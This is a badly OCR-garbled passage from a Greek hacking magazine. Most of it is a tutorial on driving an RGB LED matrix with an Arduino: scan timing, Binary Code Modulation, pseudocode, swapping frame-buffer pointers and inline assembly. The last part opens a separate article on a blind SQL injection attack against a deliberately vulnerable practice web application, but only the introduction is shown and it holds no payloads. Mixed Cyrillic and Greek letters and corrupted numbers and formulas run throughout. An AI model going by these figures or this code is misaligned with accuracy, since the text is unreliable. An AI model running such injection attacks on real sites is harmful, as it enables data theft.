Decide the condition of each LED, according to 151 bit 
Update condition of each LED 
// according to 2nd bit of intensity of each LED.. 
Get intensity value for each LED of active line 
Decide the condition of each LED, according to 2nd bit 
Update condition of each LED 
// according to 3rd bit of intensity of each LED.. 
Get intensity value for each LED of active line 
Decide the condition of each LED, according to 3rd bit 
Update condition of each LED 
METTE. 


Περιττό va πούμε Оті οὖτε κι αυτό ro πλάνο ἦταν πλήρες. (Σ.τ.Ε. Αυτή п 
НАРС, όμως, πολύ περιγραφικὴ -- και σίγουρα πλήρης!) H διάρκεια κάθε 
ενημέρωσης των LED έπρεπε να διπλασιάζεται σε κάθε βήμα κι εμεὶς ei- 
хане παραβλέψει πλήρως ауто το ζήτημα. Ωστόσο, μπορούσαμε ἠδη va 
βγάλουμε ορισμένα συμπεράσματα και δεν χρειαζόταν περισσότερη ανά- 
λυση. O σχεδιασμός µας ἦταν αδύνατο υλοποιηθεί... 


Паратпрєіотє тіс εργασἰες που μεσολαβούν ανάμεσα σε δύο ενημερώσεις 
των LED. Αρχικά, το πρὀγραμμα πρέπει να ανασύρει апо τη μνήμη τη 
φωτεινότητα για та 24 LED της ενεργἠς γραμμής”. Επομένως, ro Arduino 


4. Κάθε γραμμή περιλαμβάνει 8 pixel και κάθε pixel З LED. 


Arduino - the way of the hacker!! (μέρος 7/k) 
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πρέπει va ανατρέξει στη μνήμη 24 φορὲς. О χρόνος nou απαιτείται για va 
διαβαστούν 24 τιμὲς апо τη μνήμη εἶναι Зџрѕес. Επίσης, πρέπει va λάβου- 
µε υπόψη και την προετοιμασία του δείκτη, o οποίος προσδιορίζει κάθε 
φορὰ ro ri θα διαβαστεί. Αυτή η προετοιμασία δεν μπορεὶ να διαρκέσει λι- 
γότερο апо 1.5у5ес?. Мета την ανάγνωση αυτών των τιμών, το прбурау- 
μα ελέγχει το δεύτερο bit καθεµἰας και αποφασίζει την κατάσταση του 
αντίστοιχου LED. Χωρίς να μπούμε пал σε λεπτομέρειες, aurr η εργασία 
διαρκεί κατ’ ελἀχιστον 7,5у5ес. Με βάση το συγκεκριµένο πλάνο, λοιπὀν, 
ανάμεσα σε δύο ενημερώσεις των LED μεσολαβούν τουλάχιστον 12џѕес. 
Όμως, ανάμεσα στην nporr και στη δεύτερη ενηµέρωση των LED np£- 
πει να μεσολαβεἰ ακριβώς το xpovikó διάστηµα X. Όπως θα θυμόσαστε, 
ауто το διάστηµα το έχουμε υπολογίσει σε λιγότερο απὀ 5usec. Ακόμα кі 
ανάμεσα στη δεύτερη και στην τρίτη ενηµέρωση των LED, ο διαθἐσιµος 
χρόνος (23Χ) εἶναι και πάλι ανεπαρκἠς. 


Τι σημαίνει η φράση “ενημέρωση των LED"; To Arduino ελἐγχει τα LED 
μέσω τεσσάρων shift registers. Επομένως, yia να ενεργοποιήσει µια 
γραμμὴ και να ανάψει ἡ να σβήσει μερικὰ LED, πρέπει να στείλει 4 bytes, 
σειραϊκά. Ξέρετε πόσο διαρκεὶ αυτή η αποστολή; Στην περίπτωση nou 
έχουμε επιλέξει τη μέγιστη ταχύτητα λειτουργίας για ro 5ΡΙ5, απαιτού- 
ута! 4рѕес. Ἔτσι, ста Ί2µ56ς που υπολογἰσαμε προηγουμένως πρέπει va 
προσθέσουμε ἄλλα 4. Όπως καταλαβαίνετε, τα προβλήματα στο σχεδι- 
асно rou προγρἀμματὸς µας ἐχουν πάψει να εἶναι σοβαρά. Ἐχουν γίνει 
σχεδὸν κωμικά! 


Όλη αυτή την фра έχουμε πέσει pe ra μούτρα στη σάρωση rou matrix. Ao- 
γικὀ, θα σκεφτεἰ κανεὶς, αφού aurr| η єруасіа εἶναι μακρὰν πιο πολύπλο- 
кп апо κάθε ἀλλη. Εἶναι εξίσου λογικό, όµως, να προβληματιστούµε λίγο 
µε την προετοιμασία του επὀµενου frame. Αν εξαντλήσουμε ra 10msec 
nou μεσολαβούν ανάμεσα σε δύο σαρώσεις, το Arduino δεν θα προλάβει 
ποτὲ να σχεδιάσει το επόμενο frame. To εξαιρετικἁ πολύπλοκο πρὀγραμ- 
ра µας (αν κι órav καταφέρουμε να το ολοκληρώσουμε) θα καταντήσει 


5. Αυτό ισχύει στην ιδανικἠ περίπτωση, όταν δηλαδή οι προς ανάγνωση θέσεις βρίσκονται σε διαδοχικὲς õi- 
ευθύνσεις. Τότε, ανάμεσα στις διαδοχικἐς αναγνώσεις ο δείκτης αυξάνεται ката іа μονάδα кі αυτή η µεταβολή 
εἶναι η απλούστερη δυνατή. 


6. Το κύκλωμα που στέλνει σειραϊκά τα δεδοµένα στους shift register. 


Εικὀνα 3 

Αμέσως μετὰ urno- 
ρούμε va συνδέ- 
соиџ ro matrix. 

H χρήση καλωδίων 
µε σωστά επιλεγ- 
μένα χρώματα 
μπορεί να βοηθήσει 
αργότερα, ката 
την αντιμετώπιση 
διαφόρων προ- 
βλημάτων. Επίσης, 
όπως φαίνεται 

και στη φωτογρα- 
φία, η απόσταση 
ανάμεσα στους 
shift registers 
αποδείχτηκε πολύ 
εξυπηρετική. 
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va δείχνει µια στατικἠἡ εικὀνα. Па να αποφύγουμε αυτἠ την τραγικἠ Ka- 
τάληξη, πρέπει να δεσμεύσουμε ёха μέρος των 10msec για τη σχεδίαση 
του єпдуємой frame. Όπως αντιλαμβάνεστε, ο χρόνος nou απαιτείται γι’ 
аот την єруасіа ποικἱλει. Ένα πρὀγραμμα που προβάλει µερικἀ sprites, 
µπορεί να σχεδιάζει κάθε frame σε ελάχιστο χρόνο. Αντίθετα, va пагумі- 
δι χρειάζεται περισσότερο χρόνο. Ката μέσο оро, θα λέγαμε бт! ο єм λόγω 
χρόνος ανέρχεται στα 4msec'. Ωστόσο, αν θεωρήσουμε auT το xpóvo 
ως δεσμευμένο και δώσουμε στη σάρωση µόνο τα εναπομείναντα 6msec, 
о χρόνος X θα μειωθεί περαιτέρω. Πα την ακρίβεια, θα πέσει στα 2,9usec 
και та ђӧп ασφυκτικἁ περιθώρια θα στενέψουν κι ἀλλο! 


Ασυμπτωτικἠ προσέγγιση 


Ἠταν фамєро бт! το Arduino δεν προλάβαινε να ολοκληρώσει τις anai- 
τούμενες εργασίες, οὐτε κατὰ διάνοια. Μπροστά σε αυτό ro πρὀβλημα, η 
πρώτη λύση που σκεφτήκαμε ἠταν va ελαττώσουμε τη συχνότητα σάρω- 
σης. Με αυτόν τον τρόπο θα εξασφαλἰζαµε περισσότερο χρόνο για кабє 
σάρωση και κατ’ επἐκταση ο χρόνος X θα αυξανόταν. Θα ἀξιζε орос κάτι 
τέτοιο; Τα 100Hz που εἰχαμε επιλέξει σαν συχνότητα σάρωσης ἦταν σχε- 
бом оріака. Τα LED αποτελούν ταχύτατες και πολύ έντονες πηγὲς φωτός, 
µε αποτέλεσµα ro flickering να γίνεται εὐκολα αντιληπτὸ. Εξάλλου, akò- 
μα κι αν µειώναμε τη συχνότητα σάρωσης στα 50Hz, δεν θα катафёруа- 
µε να λύσουμε ro πρὀβλημα. Σε αυτήν την περίπτωση ο χρόνος μεταξύ 
δύο σαρώσεων θα διπλασιαζόταν (20msec) και το ἰδιο θα συνέβαινε στο 
χρόνο X (9,8usec). Παρ’ όλα αυτά, ο χρόνος X θα παρέμενε μικρότερος 
апо та 16ysec, που απαιτούσαν οι εργασἰες ανάμεσα σε δύο ενημερώσεις 
των LED. 


Φαινόταν αδύνατο va αυξήσουμε επαρκὠς το χρόνο X, αλλά δεν ἡμα- 
отау διατεθειμένοι va παραιτηθούμε. Ξέρετε τι λένε; Όταν δεν пає: ο 
Μωάμεθ στο βουνὸ, πάει το βουνὸ στο Μωάμεθ. Έτσι, η επὀόµενη λύση 
nou σκεφτήκαμε rjrav va пєріорісоцує το πλήθος των εργασιών nou pE- 
σολαβούσαν ανάμεσα σε δύο ενημερώσεις των LED. Με αυτόν τον τρόπο 
δεν θα χρειαζόταν va αυξήσουμε καθόλου το χρόνο X. Σκεφτεἰτε то εξἠς: 
Αν προετοιμάσουμε τα byte ελέγχου που πρέπει να στείλουμε κάθε φορά 
στους shift registers, οι ενημερώσεις των LED θα μπορούν va πραγµα- 
τοποιούνται ταχύτερα. Δείτε τις ακόλουθες γραμμές ψευδοκώδικα και θα 
καταλάβετε: 


Binary Code Modulation on a line 
// according to 1st bit of intensity of each LED.. 
Get precalculated LED states 
Update condition of each LED 
// according to 2nd bit of intensity of each LED.. 
Get precalculated LED states 
Update condition of each LED 
// according to 3rd bit of intensity of each LED.. 
Get precalculated LED states 
Update condition of each LED 


Dec] 


7. Μην προβληματίζεστε. Αυτή η єктірпоп αποτελεί npoióv εμπειρίας κι εξάλλου δεν εἶναι καθόλου κρἰσιµη. 
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Ката τα γνωστά, κάθε ενηµέρωση rov LED πρέπει va ισχύει για то бі- 
πλάσιο χρόνο апо την προηγούμενη. Каті τἐτοιο θα μπορούσε να γίνει 
εὐκολα µε την προσθήκη των κατάλληλων καθυστερήσεων. Ωστόσο, για 
λόγους απλὀτητας κρατήσαμε rov ψευδοκώδικα στην απλούστερη δυνα- 
τὴ µορφή. Όπως βλέπετε, ανάμεσα σε κἆθε ενηµέρωση rov LED µεσο- 
λαβούσαν πλέον λιγότερες εργασίες. Συγκεκριµένα, μεσολαβούσε μόνο 
η ανάγνωση τεσσάρων bytes απὀ τη μνήμη kai η αποστολἠ τους στους 
shift registers. Αν φροντἰζαμε ὥστε αυτά ra bytes να βρίσκονται σε біа- 
δοχικὲς θέσεις της μνήμης, τότε η λήψη και η αποστολἠ τους θα διαρκού- 
σε ακριβώς 4,75рѕес. Αυτὸς ο χρόνος, ἑστω και ортака, εἶναι μικρότερος 
апо το χρόνο X (4,9usec). Εἰχαμε ιδρὠσει, алла ra εἰχαμε καταφέρει! Ἡ 
μήπως ὀχι; Н συγκεκριμένη αλλαγἠ στην εφαρμογἠ rou BCM προὐπέθετε 
ότι οι καταστάσεις των LED (για κάθε bit της £vraong του καθενὀς) ἐχουν 
ἠδη υπολογιστεί. Αυτὀ σήμαινε ὅτι ἐπρεπε va τροποποιήσουµε και τη YE- 
νικότερη μορφὴ της ρουτίνας σάρωσης. Па va Еєкаварісоциє τη µορφή 
της ανανεωμένης ρουτίνας σάρωσης, γράψαμε και πάλι λίγες γραμμὲς 
ψευδοκώδικα: 


Interrupt Service Routine 
for k = 1 to 8 


calculate LED states of line k, according to bit 1 of 
intensity 


ΠΝ 


calculate LED states of line k, according to bit 6 of 
intensity 


Binary Code Modulation on 1st line 


Binary Code Modulation on 2nd line 


[ων] 
Binary Code Modulation on 6th line 
Binary Code Modulation on 7th line Εικόνα 4 
То ολοκληρω- 
μένο κύκλωμα 
περιλαμβάνει καὶ 
το Arduino. H 
σὐνδεσή TOU µε TO 
υπόλοιπο κύκλω- 
ра έχει ελάχιστες 
συνδέσεις. Οι shift 
registers τροφοδο- 
τούνται µε бєбоцё- 
να απὀ το κύκλωμα 
SPI και yia τη 
σχετική διασύν- 
δεση απαιτούνται 
µόνο τρία καλώδια. 
Ο διαιρέτης τάσεων 
µε τους διακόπτες 
συνδέεται µε ἑνα 
Καλώδιο στην 
αναλογική εἶσοδο 
ΑΟ. Τέλος, xp&iá- 
ζονται δύο akóua 
καλώδια, γιατην 
τροφοδοσία του 
breadbord απὀ ro 
Arduino. 
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Αυτὀ ἦταν όλο. Н ρουτίνα σάρωσης υπολογίζει την κατάσταση όλων των 
LED, για καθένα anó ra bit της ἑντασης. Προφανώς, αν και αυτό δεν 
Φαίνεται στο πλάνο, οι σχετικὲς τιμὲς θα τοποθετούνταν σε διαδοχικὲς 
θέσεις της μνήμης, ὥστε п ανἀκτησὴ τους ката την εφαρμογἠ του BCM 
να εἶναι ταχύτατη. Μήπως ropa τα εἶχαμε καταφέρει; Δυστυχώς ὀχι! 
Βλέπετε, εξαιτίας αυτἠς της δοµικἠς αλλαγής στη μορφὴ της ρουτίνας 
σάρωσης, εἰχε αλλάξει η τιµή του X. Χωρίς να μπούμε σε κουραστικὲς 
λεπτομέρειες, θα σας πούμε От! οι εργασἰες nou εἰχαμε προσθέσει στην 
αρχἡ της ρουτίνας σάρωσης διαρκούσαν 1320у5ес. Επομένως, ο διαθέσι- 
μος χρόνος yia την εφαρμογἠ του BCM στις γραμμές rou matrix μειωνό- 
ταν. Συγκεκριμένα, anó та 10msec έπεφτε στα 8,68msec. Ως εκ τούτου, 
μειωνόταν και η τιµή του χρόνου X σε 4,25у5ес. Nrapv! (Σ.τ.Ε. Η λέξη 
στο πρωτότυπο κείμενο ἦταν “διάβολε”, αλλά τη λογοκρἰναμε.) О χρόνος 
X γινόταν (ξανὰ) μικρότερος апо το χρόνο που απαιτούσαν oi εργασἰες 
μεταξύ των ενημερώσεων των LED (4,75usec). Βέβαια, οι αλλαγὲς nou 
εἰχαμε κάνει δεν ἦταν εντελὠς ἄσκοπες. Σκεφτεἰτε оті πριν апо αυτὲς, ο 
χρόνος X ἦταν στα 4,9usec, ενώ οι εργασίες απαιτούσαν Ίθμςες. Με την 
τωρινἠ μορφή της ρουτίνας σάρωσης, п απὀκλιση του X апо την επιθυ- 
иптї ἦταν μικρότερη апо 1usec! 


Τακτική υποχώρηση 


То πρὀβληµα µε το χρόνο X εἰχε περιοριστεί, алла ξεχνούσαμε кайт! βασι- 
ко. Πότε θα σχεδιάζονταν τα νέα frame; Οι υπολογισμοί µας βασίζονταν 
στην υπόθεση бт! η pouriva σάρωσης εξαντλεἰ όλο το χρόνο μεταξὺ δύο 
σαρώσεων. Ωστόσο, ὁπως εἰπαμε νωρίτερα, θα ἐπρεπε va ξεκλέψουμε 
τουλάχιστον 4msec για τη σχεδίαση των frame. Αν κάναμε κάτι τέτοιο, 
ο χρόνος yia τη σάρωση rou matrix θα μειωνόταν апо τα 10msec στα 
6msec. Βέβαια, ακόµα και µε τη βελτιωμένη µορφή της ρουτίνας σάρω- 
σης, κάτι τέτοιο ἦταν αδύνατο. О χρόνος X ἦταν ἠδη μικρότερος апо τον 
αναγκαίο. Τότε, φάνηκε От! έπρεπε να προχωρήσουμε σε πιο δραστικά 
μέτρα. О χρόνος σάρωσης rou matrix έπρεπε va μειωθεί οπωσδήποτε! 
Ὅμως ποιος παράγοντας επηρέαζε περισσότερο τη διάρκεια αυτής της 
διαδικασίας; Ὅπως εἶπαμε παραπάνω, οι πράξεις στην αρχἡ της pourivag 
σάρωσης διαρκούσαν 1,32msec. Επομένως, τα υπόλοιπα 8,68msec κα- 
ταλαμβάνονταν апо rnv εφαρμογἠ του BCM σε kåbe γραμμὴ rou matrix. 
Με алла λόγια, η εφαρμογἠ του BCM απαιτούσε το 86% του διαθέσιμου 
χρόνου... 


Н λύση βρισκόταν μπροστά µας. Н ιδέα της ἑκπτωσης апо τους αρχι- 
койос στόχους δεν µας ἄρεσε, αλλά ἡμασταν υποχρεωμένοι va την aKO- 
λουθήσουμε: Ἔπρεπε va пеєріорісоцує την ακρίβεια του Binary Code 
Modulation. Μειώνοντας την ακρἰβεια του BCM στα 6bit, η εφαρμογἠ του 
σε κάθε γραμμή θα ολοκληρωνόταν σε ἐξι βήματα кі ὀχι σε окто. Αυτή η 
µικρή αλλαγή θα ασκούσε τεράστια επίδραση στη διάρκεια της εφαρµο- 
упс του BCM. Βλέπετε, κάθε ενηµέρωση των LED ισχύει για το διπλάσιο 
χρονικό διάστηµα, σε σχἐση ue rnv αμέσως προηγούμενη. Με άλλα λόγια, 
το πλήθος rov bit της ακρίβειας του BCM κι о συνολικὸς χρόνος για την 
εφαρμογἠ του σε µια γραμμὴ, συνδέονται εκθετικάἀ! Συγκεκριµένα, ам 
αυτός ο χρόνος συμβολίζεται µε T και το πλήθος των bit µε то К, ισχύει 
η ακόλουθη σχέση: 


T-2X* (21 - 1) 


Επομένως, αν μειώσουμε το πλήθος των bit ката 2, o χρόνος εφαρµογἠς 
του BCM σε µια γραμμή υποτετραπλασιάζεται. Μετά апо αυτή τη µικρή 
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υποχώρηση στην ακρἰβεια του BCM, ra προβλἠματὰ µας θα λυθούν орі- 
отка! 


Мама βελτιστοποίησης 


Мета апо όλη αυτήν την ταλαιπωρἰα μπορούσαμε єпїтёАоис να γράψουμε 
λίγο πραγματικὀ κὠδικα. Με τη βοήθεια των πλάνων nou εἰχαμε KaTa- 
στρώσει, η συγγραφἡ της ρουτίνας σάρωσης ἐγινε γρήγορα και χωρὶς 
προβλήματα. Κάπως ἐτσι περάσαμε στο єпбуємо στάδιο: To проүрарра 
μας μπορούσε πλέον va «οδηγἠσει» ro matrix κι έπρεπε να φροντίσουμε 
για τον σχεδιασμὀ των frames. П’ αυτή την εργασία εἰχαμε προβλέψει 
περὶ τα 4msec, ανάμεσα στις σαρώσεις του matrix. Ωστόσο, ο σχεδια- 
OOG ενὸς πολύπλοκου frame θα μπορούσε να διαρκέσει περισσότερο. 
Ακριβώς γι’ αυτό, ο κύριος βρὀχος του προγράµµατος πἠρε την ακόλουθη 
μορφη: 


main program loop 
draw new frame() 
update buffers() 
react to keys() 


O κύριος βρὀχος του προγράµµατος калі τρεις συναρτήσεις. Νομίζουμε 
бт! п αποστολἠ καθεμιάς εἶναι προφανής. Н σχεδίαση ενὸς frame μπορεὶ 
va διαρκεἰ οσοδἠποτε. Ακόμα και uia фра! Н αντιγραφἠ rou “πρόχειρου” 
frame buffer στο “κανονικό” πραγματοποιείται “μόνον όταν ολοκληρω- 
θεἰ η σχεδίαση rou frame. Μετά апо αυτή την αντιγραφή, η ρουτίνα 
σάρωσης θα προβάλει πλέον το νέο frame. Τα πράγματα εδὠ εἶναι τόσο 
апла, nou καταντούν βαρετὰ. Енєїс όμως, αφού εἰχαμε παιδευτεἰ υπερ- 
Волка για να κόψουμε λίγα μικροδευτερὀλεπτα апо ‘ёо και λίγα апо κει, 
αναζητούσαμε ασυναϊσθητα την επόμενη βελτιστοποίηση. Εξετάζοντας 
τον κὠδικα, δεν αργήσαμε να βρούμε τον επόμενο στὀχο. Н αντιγρα- 
ФП των frame buffer περιελάμβανε ἑναν βρόχο, ο οποίος διάβαζε 192 
bytes апо τη uvrjun? και ra αποθἠκευε πάλι єкєї, алла σε διαφορετικἠ 
θέση. Μετά апо μετρήσεις nou πραγματοποιήσαμε, διαπιστώσαμε ὁτι η 
συγκεκριμένη єруасіа διαρκούσε пері ra 216usec. Ὅπως αντιλαμβάνε- 
στε, ауто TO Χρονικό διάστηµα δεν εισήγαγε καμία αισθητἠ καθυστέρηση 
στη λειτουργἰα του προγράµµατος. Εμεὶς, ωστόσο, νιώθαμε την ανάγκη 
να την απαλείψουμµε! 


Н αντιγραφή rov στοιχείων ємос nivaka σε Ємам ἄλλον αποτελεί µια 
απλούστατη διαδικασία. Πόσο αποδοτικότερα θα μπορούσε να γραφτεί; 
Όταν συναντάμε προβλήματα που σχετἰζονται µε τη µαζικἠ µεταφορά 
δεδομένων, το προγραμματιστικὀ µας ἐνστικτο πηγαίνει αυτόματα στους 
δείκτες. Αυτά τα --ομολογουμένως δύσχρηστα-- μεγέθη, επιτρέπουν 
μερικὰ πολὺ ἐξυπνα και апоботіка κολπάκια. E, λοιπὀν, ἑνα anó αυτά 
επιστρατεύσαµε κι εμεὶς yia va επιταχύνουμε την αντιγραφή των frame 
buffers. Συγκεκριμένα, ξεκινήσαμε ορίζοντας τους εξἠς δύο δείκτες: 
char * fb ptr cur - frame buffer1; 
char * fb ptr new - frame buffer2; 
Στη συνέχεια, φροντἰίσαμε ὡστε ὁλες οι амафорес nou yivovrav μέσα στη 
ρουτίνα σάρωσης προς ro frame buffer, να πραγματοποιούνται μέσω TOU 


δείκτη fb. ptr cur. Αντίστοιχα, φροντίσαµε ώστε ὀλες οι αναφορές nou 
γίνονταν μέσα στη ρουτίνα σχεδίασης του νέου каре προς ro αντίστοιχο 


8. Επειδή κάθε frame buffer αντιστοιχεί о" £vav πίνακα των 192byte... 
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frame buffer, va npayparonoioüUvrai μέσω rou δείκτη fb. ptr new. Μετά 
κι απ’ αυτό, απομακρύναμε то βρόχο rov 192 επαναλήψεων ο οποίος 
аутёүраф τα δεδοµένα των frame buffers, και στη θέση του βάλαμε τις 
ακόλουθες γραμμές: 


fb ptr tmp - fb ріг сиг; 
fb ptr cur = fb ptr new; 
fb ptr new - fb ріг tmp; 


О δείκτης fb ptr tmp ἦταν προσωρινὸς και χρησίμευε µόνο yia την αντι- 
μετάθεση των τιμών, των δύο ἄλλων δεικτών. Όπως αντιλαμβάνεστε, µε 
ауто το κολπάκι η ρουτίνα σάρωσης θα διάβαζε πλέον το frame buffer µε 
το νέο καρέ, ενώ η ρουτίνα σχεδίασης του νέου καρέ θα ἀρχιζε να γράφει 
πάνω сто frame buffer µε то παλιὸ καρέ. Ουσιαστικά, µε την амтірєта- 
θεση των δεικτών καταφἑρναµε να αντιστρέψουµε τους ρόλους των δύο 
frame buffers. Έτσι, η δουλειά µας γινόταν εξίσου кала και μάλιστα σε 
λιγότερο anó éva μικροδευτερὀλεπτο! Н βελτίωση nou εἶχαμε πετύχει 
ξεπερνούσε ro 216% |) 


Ανάπτυξη δίχως τέλος 


Αφού εφαρμόσαμε και то коЛпакі που περιγράψαμε παραπάνω, η pavia 
βελτιστοποίησης ἄρχισε va µας εγκαταλείπει. Ἡ τουλάχιστον έτσι νομἰσα- 
με! Το πρόγραµµα που εἰχαμε μπροστὰ µας ἦταν σχεδὸν ολοκληρωμένο. 
Εἰχαμε κατασκευάσει ша μηχανὴ η οποία σάρωνε ro matrix και φρόντιζε 
για τον κατάλληλο (και αποδοτικὀ!) χειρισμό των frame buffers. Αυτό 
nou ἐμενε ἦταν γράψουμε διάφορες εκδοχὲς για τη ρουτίνα σχεδίασης 
των νέων καρέ. Πα παράδειγµα, yia να φτιάξουμε το αγαπημένο µας pa- 
λάκι, αρκούσε ша ρουτίνα η οποία θα σχεδίαζε το χάρτη, θα τοποθετού- 
σε το ὀχημά µας και θα το μετακινούσε σύμφωνα µε та πατήματα των 
πλήκτρων. Н ἴδια ρουτίνα θα έλεγχε ам ro ὀχημά µας ἐχει πέσει πάνω 
σε капою εμπόδιο και πάει λέγοντας. Νομἰζουμε Оті το ὁλο σκεπτικὀ £i- 
ναι ξεκάθαρο. Н μηχανὴ nou εἰχαμε κατασκευάσει αποτελούσε τη βασικἠ 
υποδομὴ yia να φτιάξουμε οτιδήποτε γεννούσε η φαντασία µας! Σε auró 
το στάδιο, ємас φυσιολογικὀς ἄνθρωπος θα ξεκινούσε να αναπτύσσει µε 
хара va demo effect, ἑνα παιχνιδάκι ἡ £va πρὀγραμμα εμφάνισης Ku- 
λιόμενων μηνυμάτων, πάνω στο ἐγχρωμο matrix. Εμεὶς κάναμε κάτι δι- 
αφορετικὀ... 


Η υπόσχεση 


Πριν ξεκινήσουμε την περιγραφὴ του όλου εγχειρἡματός, αναφέραμε бт! 
£va RGB LED matrix εἰναι ikavó να προβάλει εκατομμύρια χρώματα. Σας 
δώσαμε ша υπόσχεση, ¿TOI δεν εἶναι; Εμεὶς πάντως ¿TOI νιώθαμε! Επομέ- 
мас, όταν συνειδητοποιήσαμε бт! την εἶχαμε αθετήσει, σπεύσαµε να ena- 
νορθώσουμε. Έχοντας μειώσει την ακρίβεια του Binary Code Modulation 
στα 6bit, το χρώμα κάθε pixel περιγραφόταν πλέον апо 18bit. Ауто oñ- 
раме бт! το проүрарра μπορούσε να προβάλει 218 ἡ аллос 262.144 
χρώματα. Πα va εἶἰμαστε εντάξει апемамті σας, έπρεπε va αυξήσουμε την 
ακρίβεια του ΒΟΜ τουλάχιστον στα 7bit. Με αυτόν τον τρόπο το χρώμα 
καθενός pixel θα περιγραφόταν апо 21bit και το проуранна µας θα упо- 
ρούσε να προβάλει 2221 ἡ 2.097.152 χρώματα! Όπως υποψιάζεστε, μετὰ 
апо αυτές τις σκέψεις επιστρέιψαµε пал! στη ρουτίνα σάρωσης. Έπρεπε 
va επιταχύνουμε ὀλεςτις єруасієс kai ма ξεκλέψουμε λίγο ακόµα xpóvo. 
AUT τη фора τα πράγματα εἰχαν ζορίσει για τα кала. Н ρουτίνα ἦταν 
δομημένη µε τον καλύτερο τρόπο που μπορούσαμε να σκεφτούμε και η 
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υλοποίησή της εἰχε γίνει σε C, µε rov nio αποδοτικὀ τρὀπο nou μπορού- 
caue να πετύχουμε. Τι θα μπορούσε να γίνει άραγε; 


Ένας парамоїкос θα διέγραφε το npóypaupa και θα το έγραφε пал апо 
την αρχή, εξ ολοκλήρου σε Assembly! Εμεἰς αρκεστἠκαµε σε µια ενδιάµε- 
ση λύση: Αποφασίσαµε να γράψουμε σε Assembly µὀνο τη ρουτίνα σάρω- 
σης :D Ως γνωστὸν, το περιβάλλον ανάπτυξης rou Arduino χρησιμοποιεί 
том compiler ССС. Κάτι ακὀµα που εἶναι γνωστό, εἶναι πως ο ССС єпітре- 
πει το λεγόμενο ASM inlining. Με апла λόγια, επιτρέπει την ενσωμάτωση 
κώδικα γραμμένου σε Assembly, µέσα σε προγράµµατα γραμμένα os C. 
Οι λεπτομέρειες για то пас µπορεί να γίνει кат! τέτοιο ξεφεύγουν anó то 
θέμα µας. Αρκεἰ va σας πούμε ὁτι θα μπορούσαν να αποτελέσουν το θέμα 
για ἑνα ολόκληρο ἀἆρθρο”. Па να πετύχουμε то στὀχο µας χρειάστηκε 
άφθονη μελέτη, πολλά πειράματα кі акорд περισσὀτερα λάθη. Στο τέλος 
όμως τα καταφέραμε! Μεταξύ µας, πέρα апо την ανάγκη που νιώθαμε 
να κρατήσουμε την υπὀσχεσή µας, θέλαμε να πετύχουμε кайт! ακόμα: 
Θέλαμε να δείξουμε την ανωτερότητα nou ἐχει ο κὠδικας σε Assembly, 
Отау ἐχει γραφτεί και βελτιστοποιηθεἰ “χειροκίνητα”. Πα την ιστορία, λοι- 
πόν, σημειώστε ὁτι η αρχικἠ εκδοχἠ της ρουτίνας σάρωσης απαιτούσε 
7,2msec και υλοποιούσε το BCM µε ακρίβεια 6bit. Н τελικἠ εκδοχή, µε тп 
βοήθεια της Assembly, απαιτούσε 6,8msec και προσέφερε ακρἱβεια 7bit. 
To πρὀγραμμά µας μπορούσε επιτέλους να προβάλει εκατομμύρια χρώμα- 
та κι εμεὶς, εκτὸς απὀ χαρούμενοι, ἡμασταν κι εξαντλημένοι. 


Παιχνίδι µε том κώδικα 


Όλες αυτὲς οι періурафес και οι αναλύσεις δεν θα μπορούσαν να μείνουν 
στο ҳарті. Όπως και κάθε ἄλλη фора, λοιπὀν, θα σας δώσουμε va nak£- 
TO µε όλα τα προγράµµατα nou κατασκευάσαμε. Μπορείτε ма το πάρετε 
апо εδὀ: 


http://bit.ly/dhe12ArduinoSrc 


Στο πακέτο θα βρείτε τα προγράµµατα nou τρἐξαµε oro Arduino για va 
φτιάξουμε το βιντεάκι µας (http://deltahacker.gr/?p-6394), καθώς και δύο 
templates. Πρόκειται yia τις δύο βασικὲς єкбохєс της μηχανἠς µας: Μια 
γραμμένη εξ ολοκλήρου σε C και pia στην οποία περιλαμβάνεται κὠδικας 
σε Assembly. Εσεὶς µπορείτε να χρησιμοποιήσετε οποιαδήποτε апо τις 
δύο θέλετε, για м" αναπτύξετε τις δικές σας εφαρμογές. Па va σχεδιά- 
σετε οτιδήποτε στο matrix, арке! να το σχεδιάσετε στο πρὀχειρο frame 
buffer, χρησιμοποιώντας то δείκτη fb ptr new. Па παράδειγµα, yia va 
γράψετε каті στη θέση index του εν λόγω frame buffer, арке! να δώσετε 
κάτι τέτοιο: 


(fb ptr new + index) =... 


Όλα αυτά θα πρέπει va γίνουν στη συνάρτηση draw, new. frame(). Τέλος, 
av n εφαρµογἡ σας αλληλεπιδρά µε το χρήστη, o κὠδικας για την avri- 
ὅραση του προγράµµατος σε κάθε πάτηµα πλήκτρου πρέπει va μπει στη 
συνάρτηση react on keys(). Σημειώστε ὁτι η μεταβλητή keypad. value 
φέρει κάθε στιγμὴ ша тц апо το διάστηµα 0 ¿wG 4. Όταν ἐχει την τιµή 
μηδέν δεν έχει πατηθεἰ κανένα πλήκτρο, ενώ οι υπόλοιπες τιμὲς αντιστοι- 
χούν στο πάτημα ενὸς απὸ τα τἐσσερα κουμπάκια του κυκλὠματός µας. 


Κάπου εδὠ σας αφήνουμε -- κι ελπἰζουµε να δούµε σύντομα τις бїкёс σας 
εφαρμογές! 


9, Е; Τιλέτε; 


ΕΠΙΘΕΣΗ 
LTA 
ТҮФЛА! 


Έχουμε στήσει το τέλειο θύμα: Ἕνα web 
application το onoio δεν πραγµατοποιεἰ 
σωστό input sanitization, µε συνέπεια να 
προσφέρει £va (ορθάνοιχτο) injection point. 
Ἔτσι, μπορούμε va μελετήσουμε ἑνα εἶδος 
επιθέσεων SQL injection, το onoio апоспа 
κρυφές πληροφορίἰες апо τη βάση µε rov nio 
πονηρὀ και ευρηματικὀ τρόπο... 


Skill: 
Intermediate 


| Tags: blind SQL 
injection, ASCII 
codes 
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Στο ἆρθρο nou αρχίζει апо τη σελἰδα 54 υλοποιήσαμε ёха anAoikó web 
application και ropa εἱμαστε ἐτοιμοι να rou επιτεθούµε ανελέητα. Και 
όταν λέμε ανελέητα, το εννοούμε! Αρκεἰ va avaAoyioreire πως yia την 
ανακάλυψη ємос κρυπτογραφημένου συνθηματικού θα χρειαστούν 512 
αιτήματα HTTP. Στην πορεία, βέβαια, θα δούμε ὁτι αυτό διορθώνεται. 
Ωστόσο, οι επιθέσεις blind SQL injection περιλαμβάνουν συνήθως *noA- 
Aà* HTTP requests. Ευτυχώς, στις δοκιμές µας δεν θα συναντήσουμε 
εμπόδια του τύπου Intrusion Detection Systems (IDS) ἡ Web Application 
Firewalls (WAF), ὁπως θα συνέβαινε σε камомікойс servers. Αυτή η διευ- 
κὀλυνση θα µας επιτρέψει ма εστιάσουµε στη λογικἠ της επίθεσης και να 
